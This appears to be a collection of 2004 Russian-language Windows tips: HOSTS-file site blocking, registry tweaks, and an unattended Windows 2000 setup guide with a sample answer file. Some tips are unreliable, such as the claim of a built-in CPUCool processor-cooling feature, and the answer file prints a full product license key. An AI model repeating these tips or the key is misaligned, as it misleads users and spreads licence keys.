Оказывается, в Windows XP есть очень хороший способ управления Интернетом. Тем более, что он не требует никаких дополнительных средств. По адресу WINDOWSsystem32driversetc можно обнаружить крошечный файл HOSTS. Именно он может определить какие сайты достойны Вашего внимания, какие - нет, какие баннеры можно показывать, а какие нет, наконец, именно он может существенно ускорить загрузку часто посещаемого сайта. Этот файл определяет соотношение IP адреса и доменного имени. То есть, исходя из основ, при запросе адреса, допустим в строке адреса вы набрали www.Super-sait.ru, компьютер должен связаться с одним (а можно и с несколькими) DNS. Затем этот самый сервис преобразует имя в удобоваримый для компьютера IP адрес. Для www.Super-sait.ru - это к примеру 63.138.223.36. После этого сайт загружается.

При правильном подходе к файлу HOSTS можно указать брузеру адрес сайта напрямую, обходя всякие DNS. Это ускоряет загрузку выбранного web сервера.

По умолчанию, в этом файле только одна запись: 127.0.0.1 localhost. И для использования свойств этого файла необходимо прописать корректно следующую информацию:

63.138.223.36 www.Super-sait.ru # Вначале вводим IP, а затем имя сервера. Пробел обязателен.

Так же, управляя этим файлом можно запретить доступ к некоторым сайтам вообще. Это можно сказать тот же метод, что и В IE только с огромными преимуществами. Во-первых, об этом способе мало кто знает, во-вторых, он касается не только IE но и всех остальных браузеров. Для использования этой функции необходимо ввести:

127.0.0.1 porno.ru # Система будет искать этот ресурс у себя на винчестере, само собой, она его не найдет и выдаст сообщение об ошибке.

Так же, если подумать немного можно получить ещё кое-какую пользу от использования этого файла.

SUNUN · February 23, 2004

Полезные советы по реестру

ВНИМАНИЕ данная статья предназначена только для опытных пользователей. Не опытное обращение с реестром может повлечь за собой выход компьютера из строя! На данной странице под словом "указанный ключ" понимается адрес, написанный в самом конце совета. Почти все примеры приведенные здесь в которых присутствует создание нового параметра подразумевают, что данный параметр является строковым (String), а где нужно создать иной параметр (двоичный (Binary) или DWORD) я буду об этом упоминать. Если после редактирования реестра ни чего не изменилось, то перезагрузите ваш компьютер и проверьте правильность внесенных изменений!

Отключение кэширования паролей

Если вы обеспокоены безопасностью ваших паролей (в PWL-файлах) и паролей ваших родных (тоже работающих на вашем компе), то вы можете отключить кэширование паролей (будут создаваться пустые PWL`ки). Это достигается добавлением параметра DisablePwdCaching (тип параметра: REG_DWORD) и присвоению этому параметру значения - 1. Этот параметр нужно создать в следующем ключе реестра:

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesNetwork]

Автозапуск CD-ROM`а (WinXP)

Создаем параметр Autorun (если его еще нет) и присваеваем ему: 0 - для отключения автозапуска или 1 для включения.

Ключ: [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesCDRom]

Удаляем PC Health (Win ME)

Если вас задолбал PC Health, который жрет много места, то его можно легко удалить. Создаем строковый параметр displayname и присваиваем ему имя PC Health, потом идем в Установка и удаление программ, находим там PC Health и ... .

Ключ: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstall]PC Health]

Контекстное меню IE

Переименовать или удалить некоторые команды из контекстное меню IE вызываемого кликом по ссылке можно в следующем ключе.

Ключ: [HKEY_CURRENT_USERSOFTWAREMicrosoftInternet ExplorerMenuExt]

Чистим главное меню

В ключе, который хранит информацию о порядке расположения папок и ярлыков в главном меню всегда бывает очень много мусора. А именно, когда вы сами удалите или переместите любую папку, деинсталируете прогу и тд. Короче, несуществующие разделы вы можете смело удалять!

Ключ:[HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionExplorerMenuOrderSt

art MenuPrograms]

Включение Num Lock при запуске Windows (2000/XP)

Для включения клавиши Num Lock при запуске Windows присваиваем строковому параметру InitialKeyboardIndicators значение 2, а чтобы она не включалась присваиваем параметру 1 .

Ключ: [HKEY_CURRENT_USERControl PanelKeyboard]

Автоисправление в Scandisk`е (ME)

После неправильного выключения компьютера и при следующей загрузке автоматически запускается Scandisk с установленной галочкой "Исправлять ошибки автоматически", которую нельзя снять! Для того, чтобы галочка отсутствовала по умолчанию надо установить двоичный параметр AutoChk в значение 02,00,00,00, а чтобы ее вернуть в 00,00,00,00 .

Ключ: [HKEY_USERS.DEFAULTSOFTWAREMicrosoftWindowsCurrentVersionAppletsCheck Drive]

Анимация для окон

Для того, чтобы можно было включать или отключать "Видеоэффекты для меню и подсказок" через реестр, нужно попасть в указанный ключ реестра и создать новый параметр (если его там еще нет) MinAnimate и присвоить ему значение 1, если хотите чтобы анимация была включена или 0, чтобы она была отключена.

Ключ: [HKEY_CURRENT_USERControl PanelDesktopWindowMetrics]

Изменение скорости открытия главного меню

Для тех кто забыл: главное меню - это меню вызываемое при нажатии кнопки "Пуск" на панели задач. Идем по указанному ключу и создаем новый строковый параметр MenuShowDelay и присваиваем ему значение от 1 до 10, что соответствует скорости открытия меню. Изменения должны вступить в силу после перезагрузки.

Ключ: [HKEY_CURRENT_USERСontrol PanelDesktop]

Установка путей к системным папкам

Для того, чтобы изменить пути к системным папкам, нужно залезть в указанный ключ реестра из изменить следующие параметры:

"ProgramFilesDir" - папка Program Files

"CommonFilesDir" - папка Common Files

"SystemRoot" - папка Windows

"MediaPath" - папка Media

"ConfigPath" - папка Config

"DevicePath" - папка INF

Ключ: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion]

Имя рядом с часами

В указанном ключе создаём 3 строковых параметра (порядок следует соблюдать):

"s1159" со значением "Ваше имя" (не более 8 символов).

"s2359" со значением "такое же, как и у первого".

"sTimeFormat" со значением "HH:mm:ss tt" или "tt HH:mm:ss", где tt обозначает введенный вами текст.

Ключ: [HKEY_CURRENT_USERControl panelinternational]

Изменение заголовка окна Internet Explorer (9x/NT)

Используя ключ указанный ниже, вы можете изменить заданный по умолчанию заголовок окна "Microsoft Internet Explorer", на что ни будь вроде "Мир интернет". Используя RegEdit, откройте этот ключ, создайте в нем новый строковый параметр под названием "Window Title", установите его значение равным строке, которую вы хотели бы видеть в области заголовка. Для сброса к значению по умолчанию, удалите параметр "Window Title".

Ключ: [HKEY_CURRENT_USERSOFTWAREMicrosoftInternet ExplorerMain]

Параметр: Window Title

Как избавиться от имени в окне "Установка и удаление программ"

В ниже указанном ключе хранятся все 32-разрядные программы. Чтобы удалить объект из списка надо, кликнуть по нему и нажать на клавишу "DEL".

Ключ: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrent VersionUninstall]

Где находятся команды, введенные в окне выполнить

Они находятся под ниже указанным ключом в столбце против букв "a", "b", "c" и т.д. И их можно спокойно удалять!

Ключ: [HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionExplorerRunMRU]

Как изменить имя владельца и назвние организации

Заходим в ниже указанный ключ. Находим строковый параметр Registered Owner и изменяем его значение на ваше имя. Registered Organization - на название вашей организации.

Ключ: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrent Version]

Создание ярлыка к системным папкам

Следующие действия позволяют вам создать своеобразный ярлык к многим системным папкам вашего компьютера и разместить его где угодно. Для этого надо создать папку и назвать её, например "Корзина.{645FF040-5081-101B-9F08-00AA002F954E}". После этих действий должен появиться значок (не ярлык) «Корзины». С этим объектом можно проводить любые действия. Тот же самое можно сделать и для других системных папок, изменив значения на:

Удаленный доступ к сети - «Удаленный доступ к сети.{992CFFA0-F557-101A-88EC-00DD010CCC48}»

Принтеры - «Принтеры.{2227A280-3AEA-1069-A2DE-08002B30309D}»

Панель управления - «Панель управления.{21EC2020-3AEA-1069-A2DD-08002B30309D}»

Мой компьютер - «Мой компьютер.{20D04FE0-3AEA-1069-A2D8-08002B30309D}»

Сетевое окружение - «Сетевое окружение.{208D2C60-3AEA-1069-A2D7-08002B30309D}»

Входящие - «Входящие.{00020D75-0000-0000-C000-000000000046}»

Корзина - «Корзина.{645FF040-5081-101B-9F08-00AA002F954E}»

Для получения информации по другим папкам посмотрите ключ HKEY_CLASSES_ROOTCLSID

Ключ: [HKEY_CLASSES_ROOTCLSID]

Убираем все надписи

Идём по ниже указанному ключу. Именно там Windows и хранит информацию о цвете кнопок, надписей, о цвете ползунков и т.п. Теперь меняем значения строковых параметров на:

У "Button text" на "192 192 192"

У "Window text" на "256 256 256"

У "Menu Text" на "192 192 192"

У "Info Text" на "192 192 192"

После этих действий перезагрузитесь и почти всех надписей уже не будет.

Ключ: [HKEY_CURRENT_USERControl PanelColors]

Меняем протокол в IE заданный по умолчанию

Заходим в ниже указанный ключ и меняем значение параметра "По умолчанию" с http:// на ftp:// или на gopher:// .

Ключ: [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent VersionUrlDefaultPrefix]

Меняем стандартные значки

Для этого идем по ниже указанному ключу и создаем следующие параметры:

"1" - Default Document

"2" - Приложение

"3" - Закрытая папка

"4" - Открытая папка

"6" - 3.5 Дюйиовый дисковод

"7" - Сменный жесткий диск

"8" - Жесткие диски

"9" - Сетевые диски

"11" - CD-ROM Drive

"12" - RAM Drive

"19" - Программы

"20" - Документы

"21" - Настройка

"22" - Найти

"23" - Поиск

"24" - Выполнить

"27" - Завершение работы

"25" - Приостановить работу

"36" - Программная группа

"29" - Ярлык

"34" - Desktop

"40" - Audio CD

[HKEY_CLASSES_ROOTCLSD{21EC2020-3AEA-1069-A2DD-08002B30309D}DefaultIcon]

"По умолчанию" - Панель управления

[HKEY_CLASSES_ROOTCLSD{2227A280-3AEA-1069-A2DE-08002B30309D}DefaultIcon]

"По умолчанию" - Принтеры

Нужно не забывать ставить в адресе к иконке двойной слеш () и в случае *.ICO - файла в конце адреса через запятую ставиить 0. Пример "C:Filesicon.ico,0".

Ключ: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionexplorerShell Icons]

Изменение многоцветности иконок

Для изменения способности отображать многоцветность иконок, изменяем значение параметра с 16 на 24 или даже на 32bit!

Ключ: [HKEY_CURRENT_USERControlPaneldesktopWindowMetrics]

Параметр: shell icon bpp

Версия над системная часами

Чтобы над системными часами отображалась версия Windows 98, надо в Реестре изменить(создать) строковый параметр "PaintDesktopVersion" со значения "0"(нет) на "1"(есть картинка).

Ключ: [HKey_Current_UserControl PanelDesktop]

Охлаждение процессора

Вы знаете, что в Windows (начиная с 98SE) встроенна программа охлаждения процессора (CPU) под названием CPUCool? Если нет, тогда читайте дальше! Проблема состоит в том, что по умолчанию она отключена. Идем по ниже указанному ключу. Создаем в нем новый раздел - CPUCool, а внем новый строковый параметр типа DWORD - "Idle" со значением "1".

Ключ: [HKEY_LOCAL_MACHINESystemCurrentControlSetControl]

Преписка к версии Windows

Идем по ниже указанному ключу. Находим параметр SubVersionNumber и изменяем его значение. Только не забудьте поставить впереди пробел, а то фраза прилипнет к версии Windows. Теперь вы получите, что то вроде "4.10.1998 "Ваша фраза" ". Теперь можете любоваться (Панель управленияСистема). Строковый параметр Version показывает, что за Windows у вас стоит, а параметр VersionNumber его версию.

Ключ: [HKEY_LOCAL_MACHINESOFTWAREMICROSOFTWINDOWSCURRENTVERSION]

Автозагрузка

Если при запуске Windows у вас запускаются разные программы которые вам не нужны при загрузке, а в меню ПускПрограммыАвтозагрузка их нет, то ищите проги по следующим ключам:

HKEY_CURRENT_USERSoftware MicrosoftWindowsCurrentVersionRun

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices

HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun

SUNUN · February 23, 2004

Автоматический метод установки Windows

Существует автоматический метод установки операционных систем семейства Windows, заключающийся в подготовке специального файла ответов на возможные вопросы программы установки и запуске программы установки с ключом, указывающим на этот файл. После чего система устанавливается в автоматическом режиме, не задавая никаких вопросов пользователю. Для Windows 98 и Windows Me - это хорошо известный файл msbatch.inf. Для Windows 2000 также существует аналогичный механизм, а имя файла по умолчанию Unattend.txt.

Ключи программы установки.

Запуск программы установки осуществляется командой:

из среды MS-DOS или Windows 3.1/Windows for Workgroups:

winnt /u: /s: /t: /rx:

из среды Windows 95 or Windows 98, Windows NT®, или Windows 2000:

winnt32 /unattend: /s: [/syspart:] [/copysource:] [/tempdrive:]

где:

файл, содержащий ответы на возможные вопросы программы установки (по умолчанию Unattend.txt).

расположение инсталяционных файловWindows 2000

диск, на который устанавливаем систему и размещаем временные файлы.

/syspart указывает программе установки скопировать загрузочные файлы на жесткий диск, пометить диск как активный и затем установить диск на другом компьютере. Когда этот компьютер запускается, он автоматически переходит на следующую фазу установки. Параметр /syspart всегда следует использовать вместе с параметром /tempdrive. Параметр /syspart для Winnt32.exe используется только на компьютерах с Windows NT 3.51, Windows NT 4.0 или Windows 2000. В системах Windows 9x он не предусмотрен

/tempdrive назначает размещение временных файлов в заданном разделе и установку в нем Windows 2000

/t тоже самое, что /tempdrive, но для Winnt.exe

/copysource cоздает временную дополнительную папку внутри папки, в которую устанавливаются файлы Windows 2000.

/rx тоже самое, что / copysource, но для Winnt.exe

Замечание: Используйте /t or /tempdrive ключи для установки Windows 2000 в раздел, отличный от загрузочного.

Конечно, существуют и другие ключи, если интересно, то набери winnt32 /? Или winnt /?

Итак, потрудимся. Вставляем чистую дискету и создаем в обычном текстовом редакторе файл Unattend.bat, в котором набиваем:

H:I386winnt32.exe /unattend: a:Unattend.txt /s:H: /tempdrive:F

где H: - CD ROM твоего компьютера

Формат файла ответов.

Теперь подготовим файл ответов Unattend.txt. Файл ответов - это обычный текстовый файл. Его структура стандартна для INI файлов Windows (win.ini и system.ini файлы имеют аналогичную структуру) - это разделы, заключенные в квадратные скобки и внутри каждого раздела - параметры со своими значениями, разделенные знаком равенства. Если значение имеет пробел, то его заключают в двойные кавычки. Как названия разделов, так и названия параметров строго предопределены. Допускаются комментарии, начинающиеся с точки с запятой (. Доступных для настройки параметров очень много и рассказать о каждом, практически нереально. Поэтому мы рассмотрим только основные, если тебя заинтересует, то почитаешь соответствующую документацию - "Microsoft Windows 2000 Guide to Unattended Setup" в файле Unattend.doc, находящимся на CD с дистрибутивом Microsoft Windows 2000 в архиве SupportTools Deploy.cab.

И так, опять запускаем текстовый редактор, создаем файл Unattend.txt и набираем (комментарий следует за описываемым параметром, их можно не набирать):

[unattended]

; секция означает, что будет выполняться автоматическая установка Windows.

DriverSigningPolicy= Ignore

; определяет политику по отношению к драйверам, которые не проверены и не подписаны Microsoft. Возможные значения Ignore, Warn, Block , где: Ignore - продолжаем установку в любом случае (мы лучше знаем какой драйвер подойдет), Warn - прервем установку и спросим, Block - не устанавливать драйвер.

FileSystem= LeaveAlone

; определяет, какая файловая система у Вас будет, возможные значения: LeaveAlone - оставить без изменений, ConvertNTFS - форматировать в NTFS

OemPnPDriversPath="DriversVideo; DriversIntel_PC_Camera"

; определяет пути к папкам, содержащим Plug and Play драйверы, которые не входят в поставку Windows 2000 CD. Папка должна содержать все необходимые драйверы для конкретного устройства. Букву диска указывать не надо. Setup самостоятельно добавит %systemdrive% для каждой папки

OemFilesPath="MyBMP"

; определяем папку, в которой будут лежать рисунки, логотипы

OemSkipEula=Yes

; определяет, будет ли предложено принять лицензионное соглашение (End User License Agreement or EULA), возможные значения: Yes, No. Yes - подразумевает, что лицензия прочитана и принята. No - Вам предложат принять лицензионное соглашение.

TargetPath=Win2000

; определяет папку, куда будет устанавливаться Windows 2000, возможные значения * или . * - программа установки сама создаст уникальное имя по следующему шаблону Winnt.x, (где x - 0, 1,…,999). Букву диска указывать не надо, так как она задается ключом /tempdrive (или /t).

UnattendMode= DefaultHide

; определяет автоматический режим установки, который используется во 2-ой (графической) стадии установки, возможные значения GuiAttended, ProvideDefault, DefaultHide, ReadOnly, FullUnattended. GuiAttended - пользователю нужно отвечать на вопросы. ProvideDefault -пользователю предлагается запрос на ввод значений соответствующих параметров, а значения по умолчанию берутся из файла ответов. Пользователь может изменять значения. DefaultHide - ответы из файла ответов используются по умолчанию, ничего не отображается, если какого ответа нет, то будет выведен экран, где отобразятся все параметры и можно будет как ввести недостающий ответ, так и подправить полученные из файла ответов. ReadOnly - то же, что и предыдущее значение, только пользователь не сможет ничего поменять. ReadOnly одним словом. FullUnattended - полностью автоматический режим, все берется из файла ответов, если чего нет, то произойдет ошибка.

OemPreinstall=Yes

; определяет, будет ли установка выполняться из дистрибутивной папки, созданной на жестком диске.

[GuiUnattended]

AdminPassword=1

; пароль администратора. Если *, то Null

OEMSkipRegional=1

; пропустить запрос региональных установок - 1 или нет - 0

OEMSkipWelcome=1

; пропустить страницу Welcome in GUI-mode Setup - 1

Продолжение

ProfilesDir="C:Documents and Settings "

; устанавливает папку, в которой будут храниться профили Windows 2000. По умолчанию - "%systemdrive%Documents and Settings". Но это неправильно, так как противоречит концепции раздельного размещения ОС и данных. Поэтому явно прописываем другой диск.

TimeZone=145

; определяем временную зону, 145 - это Россия, 180 - Россия (Екатеринбург), 270 Россия (Владивосток), если не указывать, то программа установки спросит сама

[userData]

; пользовательские настройки

ComputerName="Rafter Home PC"

; устанавливает имя компьютера (не более 63 символов, если больше, то обрежет), если не указать, то спросят, если *, то сгенерируется случайное имя, основанное на имени организации.

FullName="Rafter"

; устанавливает имя пользователя, если не указать, то спросят.

OrgName="Rafter home PC studio"

; устанавливает имя организации, если не указать, то спросят.

ProductID="M9G4D-R4T4R-J9QQ6-4VXBW-9YM43"

; устанавливает ID номер ОС (то, что на обложке диска)

[Display]

; определяет параметры настройки экрана

BitsPerPel=16

; определяет количество цветов, отображаемых на экране, так 8 - это 256 цветов, а 16 - 65536

Vrefresh=75

; определяет частоту обновления экрана

Xresolution=1024

; определяет разрешение по X

Yresolution=768

; определяет разрешение по Y

[RegionalSettings]

; определяет региональные установки. 419 - это Россия, 5 - это кириллица

LanguageGroup=5

Language= L0419

[OEM_Ads]

; секция позволяет изменить логотип, отображаемый в верхнем правом углу экрана и фоновую картинку отображаемые во время загрузки. Путь к картинкам задается параметром OemFilesPath в секции [unattended]. Теперь ты как и брэндовые производители сможешь выделиться

Logo=MyLogo.BMP

Background=MyBackGround.BMP

[TapiLocation]

; Секция TapiLocation определяет телефонные коды

AreaCode=8452

; определяет междугородний телефонный код

CountryCode=7

; телефонный код страны

Dialing=Pulse

; определяет тоновый Tone или импульсный Pulse режим набора номера

LongDistanceAccess

; определяет выход с ведомственной АТС в город